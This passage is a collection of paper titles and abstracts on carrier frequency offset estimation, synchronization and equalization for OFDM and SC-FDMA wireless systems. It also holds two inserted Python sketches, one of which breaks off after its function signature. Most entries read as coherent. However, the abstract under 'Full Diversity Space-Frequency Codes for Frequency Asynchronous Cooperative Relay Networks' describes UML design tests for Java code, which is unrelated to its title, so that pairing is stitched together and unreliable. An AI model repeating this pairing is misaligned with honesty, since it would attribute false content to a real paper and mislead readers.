that the new scheme completely avoids premature convergence for a large number of users as high as 32. --- paper_title: A ranging method for OFDMA uplink system paper_content: In orthogonal frequency division multiple access (OFDMA) uplink system, estimations of time delay and carrier frequency offset (CFO) are both particularly challenging. 
In IEEE 802.16-based networks, such a synchronization problem can be resolved in the initial ranging process. In this paper, exploiting the unique scheme of interleaved OFDMA, a special ranging symbol with a repetitive structure in the time domain is designed. Furthermore, a novel ranging method for OFDMA systems is proposed by utilizing this repetitive characteristic. Compared with the existing methods, this algorithm needs only one ranging symbol and obtains a more accurate estimate of the time delay; at the same time, it can estimate the integer CFO in the OFDMA uplink. Simulations illustrate the efficiency of the proposed algorithm over the existing method. --- paper_title: Adaptive schemes and analysis for blind beamforming with insufficient cyclic prefix in single carrier-frequency division multiple access systems paper_content: When the duration of the cyclic prefix (CP) is shorter than that of the channel impulse response in single carrier-frequency division multiple access systems, inter-symbol interference and inter-carrier interference will degrade the system performance. Previously, one solution to this problem, while considering the effect of carrier frequency offsets (CFOs) and the co-channel interference, is a blind receive beamforming scheme based on eigenanalysis in a batch mode. As the capability in suppressing the multipath signal with a delay larger than the CP length has not previously been analysed theoretically for that scheme, the theoretical analysis regarding the capability in suppressing the long-delayed multipath signal is provided in this study. The analysis provided in this study is also utilised to design an adaptive processing scheme. The adaptive algorithm is developed to find the beamforming weight vector updated on a per symbol basis without using reference signals. The proposed adaptive algorithm reduces the computational complexity and shows competitive performance under the insufficient CP, the CFOs, the co-channel interference and the time-varying scenarios. The simulation results reveal that the proposed adaptive algorithm provides better performance than the previously proposed algorithm. --- paper_title: Initial-Estimation-Based Adaptive Carrier Recovery Scheme for DVB-S2 System paper_content: A data-aided (DA) carrier recovery (CR) method, which can select different coarse frequency estimation (CFE) paths adaptively according to the initial estimation of the frequency offset, is proposed for the 2nd Generation Digital Video Broadcasting Satellite (DVB-S2) system to accomplish the convergence within at most 400 pilot blocks. The well-known two-step CR scheme is used for the consideration of precision and speed, whereas both the CFE and the fine frequency estimation (FFE) adopt the L&R algorithm as their basic frequency estimator so that the same correlation operation can be used by both of them to decrease the realization complexity. Optimum threshold values for different CFE paths are determined by analyzing the ill-selection probability, and robust Root Mean Square Error (RMSE) performance has been confirmed by our simulations. --- paper_title: FS-FBMC: A flexible robust scheme for efficient multicarrier broadband wireless access paper_content: An alternative implementation of the filter bank multicarrier (FBMC) concept is introduced. It is based on an FFT whose size is the length of the prototype filter.
The approach clarifies the connection with OFDM and its main benefit is in the receiver, where high performance sub-channel equalization and timing offset compensation are achieved in a straightforward manner without additional delay. The scheme is particularly appropriate for broadband wireless access, to cope with fragmented frequency bands and to optimize the utilization of the spectrum, for example with the help of water-filling based sub-channel loading algorithms. The context of TV white spaces is taken for illustration. An issue with the proposed scheme is the computational complexity in the receiver and an approach having the potential for substantial savings is mentioned. --- paper_title: Diversity analysis of distributed linear convolutive space-time codes for time-frequency asynchronous cooperative networks paper_content: This study analyses the achievable cooperative diversity order of the distributed linear convolutional space-time coding (DLC-STC) scheme for time–frequency asynchronous cooperative networks. The authors first prove that perfect time or frequency synchronisation is impractical for cooperative networks with multiple relays serving multiple destinations even when the relays know all accurate time delays and frequency offsets. Then the DLC-STC scheme, in which the exact time synchronisation at the relay nodes is unnecessary, is introduced into this type of cooperative networks. This study proves that the achievable time–frequency asynchronous cooperative diversity order of the DLC-STC scheme with maximum-likelihood receivers is equal to the number of relays. Simulation results verify the analysis. --- paper_title: On the Cyclostationarity of OFDM and Single Carrier Linearly Digitally Modulated Signals in Time Dispersive Channels: Theoretical Developments and Application paper_content: Previous studies on the cyclostationarity aspect of orthogonal frequency division multiplexing (OFDM) and single carrier linearly digitally modulated (SCLD) signals assumed simplified signal and channel models or considered only second-order cyclostationarity. This paper presents new results concerning the cyclostationarity of these signals under more general conditions, including time dispersive channels, additive Gaussian noise, and carrier phase, frequency, and timing offsets. Analytical closed-form expressions are derived for time- and frequency-domain parameters of the cyclostationarity of OFDM and SCLD signals. In addition, a condition to eliminate aliasing in the cycle and spectral frequency domains is derived. Based on these results, an algorithm is developed for recognizing OFDM versus SCLD signals. This algorithm obviates the need for commonly required signal preprocessing tasks, such as signal and noise power estimation and the recovery of symbol timing and carrier information. --- paper_title: Comments on "A Technique for Orthogonal Frequency Division Multiplexing Frequency Offset Correction" paper_content: This comment corrects a few errors found in the derivation of the maximum likelihood estimate of differential phase in the paper, "A Technique for Orthogonal Frequency Division Multiplexing Frequency Offset Correction." We show that the problem of differential phase estimation can be considered as an estimation problem in the presence of nuisance parameters, which does not satisfy strong ancillarity. The approach in the above paper to solve this problem can be understood as conditioning for elimination of nuisance parameters but without taking proper steps. 
After making corrections on the proof, it is demonstrated that the estimator in the above paper is inherently suboptimal and thus prior knowledge on the nuisance parameters, if available, can be utilized to further improve the estimation performance. --- paper_title: Error probability expressions for frame synchronization using differential correlation paper_content: Probabilistic modeling and analysis of correlation metrics have been receiving considerable interest for a long period of time because they can be used to evaluate the performance of communication receivers, including satellite broadcasting receivers. Although differential correlators have a simple structure and practical importance over channels with severe frequency offsets, closed-form expressions for the output distribution of differential correlators do not exist. In this paper, we present detection error probability expressions for frame synchronization using differential correlation, and demonstrate their accuracy over channel parameters of practical interest. The derived formulas are presented in terms of the Marcum Q-function, and do not involve numerical integration, unlike the formulas derived in some previous studies. We first determine the distributions and error probabilities for single-span differential correlation metric, and then extend the result to multi-span differential correlation metric with certain approximations. The results can be used for the performance analysis of various detection strategies that utilize the differential correlation structure. --- paper_title: An efficient algorithm for space-time block code classification paper_content: This paper proposes a novel and efficient algorithm for space-time block code (STBC) classification, when a single antenna is employed at the receiver. The algorithm exploits the discriminating features provided by the discrete Fourier transform (DFT) of the fourth-order lag products (FOLPs) of the received signal. It does not require estimation of the channel, signal-to-noise ratio (SNR), and modulation of the transmitted signal. Computer simulations are conducted to evaluate the performance of the proposed algorithm. The results show the validity of the algorithm, its robustness to carrier frequency offset, and low sensitivity to timing offset. --- paper_title: Gaussian Particle Filtering Approach for Carrier Frequency Offset Estimation in OFDM Systems paper_content: We propose Gaussian particle filtering (PF) approach for estimating carrier frequency offset (CFO) in OFDM systems. PF is more powerful especially for nonlinear problems where classical approaches (e.g., maximum likelihood estimators) may not show optimal performance. Standard PF undergoes the particle impoverishment (PI) problem resulting from resampling process for this static parameter (i.e., CFO) estimation. Gaussian PF (GPF) avoids the PI problem because resampling process is not needed in the algorithm. We show that GPF outperforms current approaches in this nonlinear estimation problem. --- paper_title: Frame Synchronization of Coded Modulations in Time-Varying Channels via Per-Survivor Processing paper_content: In this letter, an optimum frame synchronizer is proposed for coded modulations in channels with uncertainties. Coded modulations include various frame synchronization scenarios, e.g., convolutionally coded transmissions and nonlinear modulations with memory. 
Frame synchronization is proposed as a maximum a posteriori probability estimation implemented using trellis path search for Markov chain decoding. In addition, time-varying uncertainties such as frequency offset and phase noise are jointly estimated via per-survivor processing as frame synchronization proceeds. The proposed frame synchronizer exploits the coding gain of coded modulations to achieve better performance than conventional frame synchronizers. We show that the resulting frame synchronizer consists of a correlation term and two data correction terms. Numerical results show that the proposed frame synchronizer is robust to uncertainties at the receiver and it exhibits improved performance. --- paper_title: Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems paper_content: This paper proposes a general framework to effectively estimate the unknown timing and channel parameters, as well as design efficient timing resynchronization algorithms for asynchronous amplify-and-forward (AF) cooperative communication systems. In order to obtain reliable timing and channel parameters, a least squares (LS) estimator is proposed for initial estimation and an iterative maximum-likelihood (ML) estimator is derived to refine the LS estimates. Furthermore, a timing and channel uncertainty analysis based on the Cramer-Rao bounds (CRB) is presented to provide insights into the system uncertainties resulting from estimation. Using the parameter estimates and uncertainty information in our analysis, timing resynchronization algorithms that are robust to estimation errors are designed jointly at the relays and the destination. The proposed framework is developed for different AF systems with varying degrees of timing misalignment and channel uncertainties and is numerically shown to provide excellent performances that approach the synchronized case with perfect channel information. --- paper_title: Second-Order Cyclostationarity of Mobile WiMAX and LTE OFDM Signals and Application to Spectrum Awareness in Cognitive Radio Systems paper_content: Spectrum sensing and awareness are challenging requirements in cognitive radio (CR). To adequately adapt to the changing radio environment, it is necessary for the CR to detect the presence and classify the on-the-air signals. The wireless industry has shown great interest in orthogonal frequency division multiplexing (OFDM) technology. Hence, classification of OFDM signals has been intensively researched recently. Generic signals have been mainly considered, and there is a need to investigate OFDM standard signals, and their specific discriminating features for classification. In this paper, realistic and comprehensive mathematical models of the OFDM-based mobile Worldwide Interoperability for Microwave Access (WiMAX) and third-Generation Partnership Project Long Term Evolution (3GPP LTE) signals are developed, and their second-order cyclostationarity is studied. Closed-form expressions for the cyclic autocorrelation function (CAF) and cycle frequencies (CFs) of both signal types are derived, based on which an algorithm is proposed for their classification. The proposed algorithm does not require carrier, waveform, and symbol timing recovery, and is immune to phase, frequency, and timing offsets. The classification performance of the algorithm is investigated versus signal-to-noise ratio (SNR), for diverse observation intervals and channel conditions. In addition, the computational complexity is explored versus the signal type.
Simulation results show the efficiency of the algorithm in terms of classification performance, and the complexity study proves the real-time applicability of the algorithm. --- paper_title: Self-Cancellation of Sample Frequency Offset in OFDM Systems in the Presence of Carrier Frequency Offset paper_content: A self-cancellation scheme is proposed to cope with the sample frequency offset (SFO) problem in OFDM systems in the presence of a carrier frequency offset (CFO). Making use of the symmetry between the phase shifts caused by SFO and the subcarrier index, we put the same constellation symbol on symmetrical subcarriers, and combine the pairs at the receiver coherently. In this way, the SFO effects are approximately cancelled at the price of halving the bandwidth efficiency. However, some array gain and diversity gain are obtained from the symmetrical combining. Our scheme can work well together with the phase tracking for residual CFO, so that both SFO and residual CFO can be removed with low complexity. Simulations show that our scheme effectively removes the effect of SFO; the proposed system outperforms the ideal normal OFDM system (with no SFO) under the same energy efficiency at high SNR, so the proposed system will also outperform the normal system that uses the same overhead for SFO estimation. Finally, a mixed system is proposed to mitigate the drawbacks of our design and of the normal OFDM systems for SFO compensation. Our scheme may be helpful for the synchronization of multiple SFOs in cooperative transmission. --- paper_title: Joint estimation and suppression of phase noise and carrier frequency offset in multiple-input multiple-output single carrier frequency division multiple access with single-carrier space frequency block coding paper_content: Carrier frequency offset (CFO) and phase noise are challenging problems in the single carrier frequency division multiple access (SC-FDMA) system. In this study, the authors have studied single-carrier space frequency block coding (SC-SFBC) to reduce the peak to average power ratio (PAPR) of the multiple-input multiple-output (MIMO) SC-FDMA signal, since Alamouti SFBC would change the signal spectrum structure, break the single-carrier property and increase the PAPR. Also, the authors propose a joint algorithm to suppress the inter-carrier interference (ICI) caused by phase noise and CFO. Conventional methods estimate the phase noise and the CFO in separate algorithms, which makes it difficult and complicated to obtain accurate estimation results. Unlike the conventional works, the novelty of the authors' proposed algorithm is that it directly calculates the interference components and then reconstructs the ICI matrix. Thus, it avoids the degrading interactions between phase noise and CFO estimations. The proposed algorithm exploits block-type pilots, which are a common pilot pattern in SC-FDMA communications and are used in other wireless communication standards. Simulation results show that the suppression performance remains stable while the phase noise and CFO vary, and the BER performance degradation can be reduced by 3 dB. --- paper_title: Frequency Offset Estimation for Unknown QAM Constellations paper_content: We introduce a novel, both gain and signal-to-noise ratio independent, constellation unaware, blind frequency offset estimation procedure for QAM signals.
Asymptotic performance analysis and numerical simulations show that the herein presented method outperforms a selected state-of-the-art blind constellation-unaware estimator, especially for cross constellations. --- paper_title: A Robust Estimation of Residual Carrier Frequency Offset With I/Q Imbalance in OFDM Systems paper_content: In this paper, we focus on improving the accuracy of frequency offset estimation for an orthogonal frequency-division multiplexing (OFDM) system under the joint impairments of carrier frequency offset (CFO) and in-phase/quadrature (I/Q) imbalance. To propose a robust CFO estimation scheme and to benchmark its performance, the performance of the conventional frequency estimation algorithm in the presence of I/Q imbalance is analyzed, and some modifications to the conventional estimation scheme are highlighted. We show via simulations that such a design achieves a remarkable robustness against I/Q imbalance; thereby, the proposed scheme can efficiently estimate the CFO, irrespective of the I/Q mismatch. --- paper_title: Mixture Kalman filtering for joint carrier recovery and channel estimation in time-selective Rayleigh fading channels paper_content: This paper proposes a new blind algorithm, based on Mixture Kalman Filtering (MKF), for joint carrier recovery and channel estimation in time-selective Rayleigh fading channels. MKF is a powerful tool for estimating unknown parameters in non-linear, non-Gaussian, real-time applications. We use a combination of Kalman filtering and Sequential Monte Carlo sampling to estimate the channel fading coefficients and the joint posterior probability density of the unknown carrier offset and transmitted data, respectively. We study the effect of Signal to Noise Ratio (SNR) and Doppler shift on the Mean Square Error (MSE) and Bit Error Rate (BER) performance of the proposed algorithm through computer simulations. The results show that the BER of the proposed algorithm achieves the theoretical performance slope for the full acquisition range of normalized carrier frequency offset. --- paper_title: Analysis and suppression of effects of CFO and phase noise in WFMT modulation for vehicular communications paper_content: We investigate the WFMT (wavelet filtered multitone) modulation scheme for vehicular systems and describe the effect of the carrier frequency offset and phase noise on the performance of this scheme. The WFMT modulation scheme is based on wavelet theory and complex filter banks for the synthesis and analysis of the multi-channel signal. It retains the advantages of filter bank systems, decreases the system complexity, and simplifies the implementation of the filter banks. In this paper, we compare the ISI (inter-symbol interference) and ICI distortions of the WFMT and vehicular OFDM systems due to the CFO (carrier frequency offset) and phase noise. We analyze the PAPR performance of these systems and show the BER performance curves under HPA nonlinearity and ICI owing to the Doppler frequency shift and the frequency offset. Also, the performance of the WFMT system versus vehicular OFDM is calculated to find the SNR degradation of DMT (discrete multitone)/OFDM and WFMT systems with the number of FFT points in the presence of ICI, ISI, phase noise, PAPR and the Doppler effect. In the simulation results, the PAPR performance of the WFMT system becomes worse because of the characteristics of the wavelet coefficients.
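To make the mixture Kalman filtering idea above concrete, the sketch below shows a simplified Rao-Blackwellized variant under stated assumptions that differ from the cited blind algorithm: known pilot symbols instead of unknown data, a flat AR(1) approximation of the Rayleigh fading, and a fixed grid of CFO hypotheses acting as particles. Conditioned on each CFO hypothesis the fading tap is linear-Gaussian, so a scalar Kalman filter tracks it and its predictive likelihood updates the particle weight; all names and parameter values are illustrative.

```python
import numpy as np

def mixture_kalman_cfo(y, s, eps_grid, a=0.999, q=1e-3, R=1e-2):
    """Toy mixture-Kalman-style joint CFO / flat-fading tracker (pilot-aided sketch).

    y: received samples, s: known pilot symbols, eps_grid: candidate normalized CFOs,
    a, q: AR(1) fading coefficient and process-noise variance, R: measurement-noise variance.
    """
    eps = np.asarray(eps_grid, dtype=float)
    M = len(eps)
    w = np.full(M, 1.0 / M)              # particle weights over CFO hypotheses
    h = np.zeros(M, dtype=complex)       # per-particle Kalman mean of the fading tap
    P = np.ones(M)                       # per-particle Kalman variance

    for n, (yn, sn) in enumerate(zip(y, s)):
        c = np.exp(2j * np.pi * eps * n) * sn       # effective observation gain per particle
        h_pred = a * h                              # AR(1) prediction of the fading tap
        P_pred = (a ** 2) * P + q
        e = yn - c * h_pred                         # innovation per particle
        S = (np.abs(c) ** 2) * P_pred + R           # innovation variance
        w *= np.exp(-np.abs(e) ** 2 / S) / S        # complex-Gaussian predictive likelihood
        w /= w.sum()
        K = P_pred * np.conj(c) / S                 # Kalman gain
        h = h_pred + K * e                          # measurement update
        P = (1.0 - (K * c).real) * P_pred

    return float(np.sum(w * eps)), h, w             # weighted-mean CFO estimate

# Example grid (illustrative): eps_grid = np.linspace(-0.02, 0.02, 201)
```

Keeping the CFO particles on a static grid and avoiding resampling mirrors the observation in the Gaussian particle filtering entry earlier in this list that resampling causes particle impoverishment when the parameter of interest is static.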
--- paper_title: Joint sector identity and integer part of carrier frequency offset detection by phase-difference in long term evolution cell search process paper_content: In the Long Term Evolution (LTE) system, the initial cell search needs not only to achieve the timing synchronisations of symbols, slots and frames, but also to detect the sector identity (ID), the cell ID group and the carrier frequency offset (CFO), which includes an integer part (ICFO) and a fractional part. To accomplish this cell search process, two synchronisation signals, the primary synchronisation signal (PSS) and the secondary synchronisation signal, are periodically broadcasted from base stations in the LTE system. The PSS is mainly used for sector ID detection. In this study, an innovative algorithm for detecting the sector ID and ICFO together via the PSS-matching process is presented. In the proposed scheme, the phases of the differential correlation instead of the absolute values are adopted to determine the ICFO. Furthermore, a new set of PSS is proposed in order to improve the success probability of ICFO detection. Compared with conventional schemes, the proposed scheme can detect both the sector ID and ICFO with higher accuracy and much lower complexity. --- paper_title: Estimation of residual carrier and sampling frequency offsets in OFDM-SDMA uplink transmissions paper_content: This paper investigates the estimation of multiple residual carrier frequency offsets (RCFOs) and sampling frequency offsets (SFOs) in the uplink of a multiuser OFDM network with space division multiple access (SDMA). The proposed solutions are based on the presence of some dedicated pilot tones within the signal spectrum, which are traditionally employed in OFDM systems to track channel variations and residual frequency errors. The main obstacle is the large number of parameters involved in the estimation process, which makes the uplink synchronization a rather challenging task. A practical solution to this problem relies on the separation of the received signals before the estimation procedure is started. This way, the RCFOs and SFOs of different users are estimated independently with affordable complexity. We propose two alternative approaches for users' separation. The former is based on the use of orthogonal pilot sequences, while the latter exploits the distinct spatial signatures of the uplink signals. Computer simulations and theoretical analysis are employed to assess the performance of the proposed schemes and to make comparison with existing alternatives. --- paper_title: Uplink single-carrier frequency division multiple access system with joint equalisation and carrier frequency offsets compensation paper_content: Similar to the orthogonal frequency division multiple access (OFDMA) system, the single-carrier frequency division multiple access (SC-FDMA) system also suffers from frequency mismatches between the transmitter and the receiver. As a result, in this system, the carrier frequency offsets (CFOs) disrupt the orthogonality between subcarriers and give rise to inter-carrier interference (ICI) and multiple access interference (MAI) among users. The authors present a new minimum mean square error (MMSE) equaliser, which jointly performs equalisation and carrier frequency offsets (CFOs) compensation. The mathematical expression of this equaliser has been derived taking into account the MAI and the channel noise. 
A low complexity implementation of the proposed equalisation scheme using a banded matrix approximation is presented here. From the obtained simulation results, the proposed equalisation scheme is able to enhance the performance of the SC-FDMA system, even in the presence of estimation errors. --- paper_title: Hybrid time/frequency domain compensator for RF impairments in OFDM systems paper_content: I/Q signal processing based communication systems suffer from analog front-end (FE) imperfections such as in-phase and quadrature-phase (I/Q) imbalance and carrier frequency offset (CFO). These impairments are commonly encountered in all practical implementations, and severely degrade the obtainable link performance. Moreover, orthogonal frequency division multiplexing (OFDM)-based systems are particularly sensitive to radio frequency (RF) impairments. In this paper, we analyze the impact of transmitter and receiver I/Q imbalance together with channel distortion and CFO error on an ideal transmit signal, and propose low-complexity DSP algorithms and compensation structure for coping with such imperfections. Based on our proposed estimation/compensation structure, we are able to decouple the impairments and process them individually with rather low-complexity. More specifically, we first apply a blind algorithm for receiver I/Q imbalance compensation, followed by an efficient time domain CFO estimator and compensator. The transmitter I/Q imbalance and channel are then equalized jointly, in the frequency domain, with maximum-likelihood (ML) or zero-forcing (ZF) schemes, respectively. The applied algorithms are either blind working without aid of any training symbol or use only one OFDM symbol for impairments estimation, providing an efficient alternative solution with reduced complexity. The computer simulation results indicate a close to ideal performance of ZF scheme, and suggest that additional performance improvement due to frequency diversity can be obtained when ML estimation technique is employed. --- paper_title: BER Analysis of Uplink OFDMA in the Presence of Carrier Frequency and Timing Offsets on Rician Fading Channels paper_content: In orthogonal frequency-division multiple access (OFDMA) on the uplink, the carrier frequency offsets (CFOs) and/or timing offsets (TOs) of other users with respect to a desired user can cause multiuser interference (MUI). Analytically evaluating the effect of these CFO/TO-induced MUI on the bit error rate (BER) performance is of interest. In this paper, we analyze the BER performance of uplink OFDMA in the presence of CFOs and TOs on Rician fading channels. A multicluster multipath channel model that is typical in indoor/ultrawideband and underwater acoustic channels is considered. Analytical BER expressions that quantify the degradation in BER due to the combined effect of both CFOs and TOs in uplink OFDMA with M-state quadrature amplitude modulation (QAM) are derived. Analytical and simulation BER results are shown to match very well. The derived BER expressions are shown to accurately quantify the performance degradation due to nonzero CFOs and TOs, which can serve as a useful tool in OFDMA system design. --- paper_title: On Frequency Offset Estimation for OFDM paper_content: This paper presents a comparative study of Schmidl-Cox (SC) and Morelli-Mengali (MM) algorithms for frequency offset estimation in OFDM, along with a new least squares (LS) and a new modified SC algorithm. 
All algorithms have comparable accuracy, asymptotically approaching the Cramer-Rao bound. The complexity of the LS algorithm is between O(N) and O(N log N) operations, where N is the length of the training sequence, while the complexity of the SC algorithm is between O(N log N) and O(N^2) operations, and the complexity of the MM algorithm is O(N^2) operations. The modified version of the SC algorithm requires only one training sequence, as opposed to the two required by the original SC algorithm, and has significantly reduced O(N log N) complexity. The sensitivity of the three algorithms to quantization of the arg function (the argument of a complex number) is analyzed and quantified. The analysis and simulation results demonstrate that while all considered algorithms can be used with coarse quantization of the arg function, the LS algorithm is least affected and the SC algorithm is most affected by this quantization error. --- paper_title: Iterative frequency-domain fractionally spaced receiver for zero-padded multi-carrier code division multiple access systems paper_content: In this study, the authors propose an improved frequency-domain fractionally spaced (FDFS) minimum mean square error (MMSE) receiver for zero-padded multi-carrier code division multiple access (MC-CDMA) systems when the guard interval is not enough to avoid the inter-symbol interference (ISI) caused by the multipath channel. The proposed novel iterative FDFS-based receivers first reconstruct the received symbol to reduce the ISI and are then followed by the FDFS-based equalisers to minimise the effect of ISI and inter-carrier interference (ICI) caused by carrier frequency offset (CFO) and Doppler shifts. A few iterations are performed to achieve the expected bit error rate (BER) performance. To reduce the receiver complexity, novel simplified diagonal FDFS-based receivers with a fixed noise variance are developed with slight performance degradation. The proposed iterative receivers have not been studied in the existing literature. Simulation results show that the proposed iterative FDFS-based receivers can significantly improve the BER performance of the conventional FDFS-MMSE receiver in severe multiple-interference environments caused by multipath, CFO and Doppler shift. --- paper_title: An Adaptive Receiver Design for OFDM-Based Cooperative Relay Systems Using Conjugate Transmission paper_content: Cooperative relay systems have attracted much attention in wireless communications in recent years due to their various potentials in the enhancement of diversity, achievable rates and coverage range. By using spatially distributed relays capable of forwarding data through statistically independent links, cooperative relaying can fulfill conventional multiple-input multiple-output (MIMO) transmission in a more feasible way. It is more appealing to wireless high rate multimedia applications to employ orthogonal frequency division multiplexing (OFDM) in cooperative relay systems, since OFDM has desirable properties for wireless transmission such as high bandwidth efficiency and resistance to the multipath delay spread. However, the performance of OFDM-based cooperative relay systems is still sensitive to the intercarrier interference (ICI) induced by the frequency offset. The ICI problem becomes more complicated since the signals forwarded by relays would suffer from statistically independent channel fadings and frequency offsets, which has rarely been dealt with in conventional ICI cancellation schemes.
Therefore, the thesis first focuses on some existing ICI cancellation schemes based on the two-path conjugate transmission, including conjugate cancellation (CC), phase rotated conjugate cancellation (PRCC), and the adaptive receivers, which provide remarkable performances for OFDM systems not using relays. We point out the performance deficiency of the receiver designs in the above schemes when conjugate transmission is carried out in the two-relay cooperation scenario. Then, we develop an adaptive receiver that is suitable for OFDM-based cooperative relay systems based on conjugate transmission. In the proposed scheme, not only the phase rotations are applied, but also the amplitudes are adjusted on the two receiving paths. We provide theoretical derivation for the optimal values of both the phase rotations and the amplitude scale using criteria of maximizing the carrier-to-interference ratio and minimizing the ICI power, respectively. We also develop an adaptive process for updating the phase rotations and the amplitude scale using the normalized block least mean-squared (BLMS) algorithm to track channel and frequency offset variation under time-varying environments. Simulation results show that the proposed adaptive receiver is better than other related works for OFDM-based cooperative relaying systems. It is also demonstrated that the proposed scheme is robust against limited channel estimation errors --- paper_title: Wireless Visions: A Look to the Future by the Fellows of the WWRF paper_content: In less than two decades, mobile communication has developed from a niche application to a mass-market high-tech product, having experienced an unprecedented growth, never achieved by any other technology, whether radio, television, or even the Internet. Thirteen well-known experts, all of them honored as WWRF Fellows, have been interviewed and shared their expertise and opinions on ten questions about the wireless future, as presented here. The answers span a wide field from air interfaces, networks, devices, applications, to new ways of interaction, to name a few. Although the ideas and views presented here are not one common vision, they should provide stimulating ideas and questions for future research, and it will be exciting to see how things are really going to develop. The Fellows' ideas also clearly show the fascination, impact, and opportunities wireless communications has and will have in the future. --- paper_title: An average Cramer-Rao bound for frequency offset estimation in frequency-selective fading channels paper_content: Several variations of Cramer-Rao bounds for carrier frequency offset (CFO) estimation in frequency-selective fading channels have been used to benchmark practical estimators' performance or to design training signals for CFO estimation. Among them, the extended Miller-Chang bound (EMCB) provides a tighter bound than the CRB for locally unbiased estimators. However, there is no closed-form expression of the EMCB for the CFO estimation in frequency-selective fading channels with an arbitrary training signal. In this letter, we derive a closed-form exact average CRB (the EMCB) valid for any training signal and any signal structure for the CFO estimation over frequency-selective Rayleigh fading channels with uncorrelated or arbitrarily correlated taps. The accuracy and generality of the proposed average CRB expression, and its advantages over the existing expressions are corroborated by numerical and simulation results. 
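For orientation, the fading-channel bounds discussed in the entry above (CRB variants and the EMCB) are usually read against the classical AWGN baseline for a single complex exponential observed over N samples with unknown amplitude and phase. Written for the CFO normalized to the sampling rate, that textbook bound is

```latex
\operatorname{var}(\hat{\varepsilon}) \;\ge\; \mathrm{CRB}(\varepsilon)
  \;=\; \frac{3}{2\pi^{2}\,\mathrm{SNR}\,N\,(N^{2}-1)},
\qquad \mathrm{SNR} = \frac{|A|^{2}}{\sigma^{2}},
```

which serves only as a reference point and is not the closed-form average CRB (EMCB) over frequency-selective Rayleigh fading derived in the cited letter.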
--- paper_title: A Comment on “A Blind OFDM Synchronization Algorithm Based on Cyclic Correlation” paper_content: This comment points out several errors in the above letter. The correct frequency offset estimator is then proposed. Monte Carlo simulation results validate our analytical observations. --- paper_title: Full Diversity Space-Frequency Codes for Frequency Asynchronous Cooperative Relay Networks with Linear Receivers paper_content: In a previous work, we presented a technique that allows verifying the conformance between Java implementations and UML class diagrams, using design tests. While it allowed verifying conformance it does so in a sense that does not deal adequately with some design patterns. In such scenarios, there are semantic constraints among the involved elements that UML does not allow our technique to recognize them. Therefore, if one evolves the implementation violating the design pattern, the generated design tests will no longer be capable of detecting the design violation. To address this problem, we propose in this paper an approach based on: (1) UML profiles to explicitly tag UML incorporating design patterns; and (2) a set of design test templates able to recognize the appropriate implementation of these design patterns on Java code. We also present a prototype capable of automatically generating the design tests to verify the design patterns explicated by the UML profile. --- paper_title: Adaptive Frequency-Domain RLS DFE for Uplink MIMO SC-FDMA paper_content: It is well known that, in the case of highly frequency-selective fading channels, the linear equalizer (LE) can suffer significant performance degradation compared with the decision feedback equalizer (DFE). In this paper, we develop a low-complexity adaptive frequency-domain DFE (AFD-DFE) for single-carrier frequency-division multiple-access (SC-FDMA) systems, where both the feedforward and feedback filters operate in the frequency domain and are adapted using the well-known block recursive least squares (RLS) algorithm. Since this DFE operates entirely in the frequency domain, the complexity of the block RLS algorithm can be substantially reduced when compared with its time-domain counterpart by exploiting a matrix structure in the frequency domain. Furthermore, we extend our formulation to multiple-input–multiple-output (MIMO) SC-FDMA systems, where we show that the AFD-DFE enjoys a significant reduction in computational complexity when compared with the frequency-domain nonadaptive DFE. Finally, extensive simulations are carried out to demonstrate the robustness of our proposed AFD-DFE to high Doppler and carrier frequency offset (CFO). --- paper_title: Single-Carrier Systems With MMSE Linear Equalizers: Performance Degradation due to Channel and CFO Estimation Errors paper_content: We assess the impact of the channel and carrier frequency offset (CFO) estimation errors on the performance of single-carrier systems with MMSE linear equalizers. Performance degradation is caused by the fact that a mismatched MMSE linear equalizer is applied to channel output samples with imperfectly canceled CFO. We develop asymptotic expressions for the excess mean square error (EMSE) induced by the channel and CFO estimation errors. Under some realistic assumptions, we derive a simple EMSE approximation which reveals that performance degradation is mainly caused by the imperfectly canceled CFO. 
Furthermore, the EMSE is approximately proportional to the CFO estimation error variance, with the proportionality factor being independent of the training sequence. Thus, optimal training sequence (TS) design for CFO estimation is also highly relevant for joint channel and CFO estimation. --- paper_title: Joint Bit and Power Loading Algorithm for OFDM Systems in the Presence of ICI paper_content: It is well known that orthogonal frequency division multiplexing (OFDM) is robust to frequency-selective fading in wireless channels. However, it is sensitive to carrier frequency offset (CFO) which results in inter-carrier interference (ICI) and then degrades the transmission performance significantly. In this paper, a resource allocation scheme for OFDM systems in the presence of ICI is proposed. The aim of the proposed scheme is to maximize the system throughput under a total transmission power constraint. By allocating the resource appropriately, the effect of ICI can be reduced without any ICI cancellation scheme at the receiver, resulting in the increase of system throughput. Numerical results show that the proposed scheme has better throughput as compared to the adaptive subcarrier bandwidth method with equal power allocation or power allocation method with conventional water-filling algorithm. --- paper_title: Blind Maximum Likelihood Carrier Frequency Offset Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, based on the maximum likelihood (ML) criterion, we propose a blind carrier frequency offset (CFO) estimation method for orthogonal frequency division multiplexing (OFDM) with multi-antenna receiver. We find that the blind ML solution in this situation is quite different from the case of single antenna receiver. As compared to the conventional MUSIC-like CFO searching algorithm, our proposed method not only has the advantage of being applicable to fully loaded systems, but also can achieve much better performance in the presence of null subcarriers. It is demonstrated that the proposed method also outperforms several existing estimators designed for multi-antenna receivers. The theoretical performance analysis and numerical results are provided, both of which demonstrate that the proposed method can achieve the Cramer-Rao bound (CRB) under the high signal-to-noise ratio (SNR) region. --- paper_title: Joint Carrier Frequency Offset and Direction of Arrival Estimation via Hierarchical ESPRIT for Interleaved OFDMA/SDMA Uplink Systems paper_content: In this paper, we propose an efficient algorithm to jointly estimate the directions of arrival (DOAs) and carrier frequency offsets (CFOs) in interleaved orthogonal frequency division multiple access / space division multiple access (OFDMA/SDMA) uplink networks. The algorithm makes use of the signal structure by estimating the CFOs and DOAs in a hierarchical tree structure, in which two CFO estimations and one DOA estimation are employed alternatively. One special feature in the proposed algorithm is that the algorithm proceeds in a coarse-fine manner with temporal filtering or spatial beamforming being invoked between the parameter estimations to decompose the signals progressively into subgroups so as to enhance the estimation accuracy and lower the computational overhead. Simulations show that the proposed algorithm can provide satisfactory performance with increased channel capacity. 
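The hierarchical scheme above builds on ESPRIT-type estimation. As a hedged illustration of the basic building block only (not the paper's hierarchical CFO/DOA procedure, beamforming or temporal filtering), the following Python sketch applies a standard one-dimensional ESPRIT estimator to a sum of complex exponentials, as would arise when several users' CFOs modulate an interleaved uplink signal; the window length and example frequencies are illustrative assumptions.

```python
import numpy as np

def esprit_freqs(x, K, M=None):
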